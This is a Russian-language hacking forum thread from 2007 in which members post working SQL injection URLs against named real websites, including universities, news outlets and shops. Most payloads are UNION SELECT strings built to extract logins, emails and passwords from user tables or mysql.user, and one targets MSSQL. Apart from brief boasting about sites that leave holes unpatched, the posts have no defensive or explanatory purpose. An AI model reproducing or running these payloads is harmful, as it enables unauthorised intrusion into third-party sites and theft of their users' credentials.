HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #581  
Старый 25.02.2007, 22:23
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от SWAT  
http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,6,7,8+from+user/*
Цитата:
Сообщение от kair  
http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,6,7,8+from+user/*
Ну и я тогда этот скуль напишу
Цитата:
http://director-online.com/buildArticle.php?id=-1160+union+select+1,2,3,4,5,concat(email,char(58), password),7,8+from+phorum_users/*
И еще парочку.
Цитата:
http://www.regenwald.org/news.php?id=-569%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13/*
Цитата:
http://www.agh.edu.pl/news.php?id=-389%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15/*
Цитата:
http://www.primocanale.it/news.php?id=-12288%20UNION%20SELECT%200,user,2,3,4,password,6,7 ,8%20from%20mysql.user/*
Цитата:
http://www.aquionics.com/news.php?id=700000000000000%20UNION%20SELECT%200,1 ,2,concat(username,char(58),password,char(58)),4,5 %20from%20users/*
 
Ответить с цитированием

  #582  
Старый 26.02.2007, 04:06
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Код:
__http://www.vyshop.com/product_detail.php?id=-5+union+select+1,concat(user(),char(58),database(),char(58),version()),333,444,555,6,7,8,9,10,11/*
Код:
__http://www.gamesfirst.com/index.php?id=1132'

Последний раз редактировалось Thanat0z; 26.02.2007 в 04:08..
 
Ответить с цитированием

  #583  
Старый 26.02.2007, 04:59
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+1,count(*),3+from+users/*
http://www.gamesfirst.com/index.php?id=-1132+UNION+SELECT+null,concat(userid,char(58),user name,char(58),password),null+from+users/*

Когда же по нормальному все научитесь делать чуть какое то отклонение от правил сразу... такие глаза oO )))
 
Ответить с цитированием

  #584  
Старый 26.02.2007, 17:25
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.golodomor.org.ua/news.php?id=-1640%20UNION%20SELECT%200,1,2,3,concat(id,char(58) ,name,char(58),email,char(58),pass),5%20from%20use rs%20limit%204,1/*
Цитата:
http://www.patriciapiccinini.net/news.php?id=-46%20union%20select%201,2,concat(id,char(58),login ,char(58),email,char(58),password),4,5%20from%20de alers/*
 
Ответить с цитированием

  #585  
Старый 26.02.2007, 17:41
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
Сообщение от kamaz  
golodomor.org.ua
уже было, не латают они дыры, а потом жалуются что злобные хакеры коцают их
 
Ответить с цитированием

  #586  
Старый 26.02.2007, 18:30
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

_http://www.rsi.ru/news/news.asp?id=2334+or+1=(SELECT+TOP+1+cast(LOGINS+as +nvarchar)%2B%27%3A%27%2Bcast(PASSWORD+as+nvarchar )%2B%27%3A%27%2Bcast(MAIL+as+nvarchar)+from+RSI_LO GINS+where+Id=1)--
вот и mssql забацал

_http://www.eng.wayne.edu/news.php?id=-99+union+select+1,id,3,4,5,6,7,8,9,0,1,2,3+from+us ers/*
а вот с названием отстальных колонок проблемы

Последний раз редактировалось злюка; 26.02.2007 в 19:41..
 
Ответить с цитированием

  #587  
Старый 26.02.2007, 20:08
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.duet-service.ru/conf/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.ww-realty.ru/main.php?pg=faq&faqaction=showsubheading&id=-1+union+select+1,2,database(),4,5,6/*

Последний раз редактировалось Grey; 26.02.2007 в 21:02..
 
Ответить с цитированием

  #588  
Старый 26.02.2007, 20:59
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.cs.duke.edu/nano/faculty_details.php?facid=-16+union+select+1,2,3,4,5,convert(table_name+using +latin1),7,8,9,10,11,12,13,14,15,16+from+INFORMATI ON_SCHEMA.TABLES+limit+33,1
=\ опять еду
 
Ответить с цитированием

  #589  
Старый 26.02.2007, 21:40
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от злюка  
_http://www.eng.wayne.edu/news.php?id=-99+union+select+1,id,3,4,5,6,7,8,9,0,1,2,3+from+us ers/*
а вот с названием отстальных колонок проблемы
вот еще одну нашел accessid
 
Ответить с цитированием

  #590  
Старый 26.02.2007, 22:40
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.kelektro.ru/katalog.phtml?N_KATALOG_TEXT=-1+union+select+1,user(),3,4,5,6,7,8/*

http://www.mikroakustika.ru/cnt1.php?l1=-1+union+select+1,user(),3,4,5,6/*

Последний раз редактировалось Grey; 26.02.2007 в 23:02..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ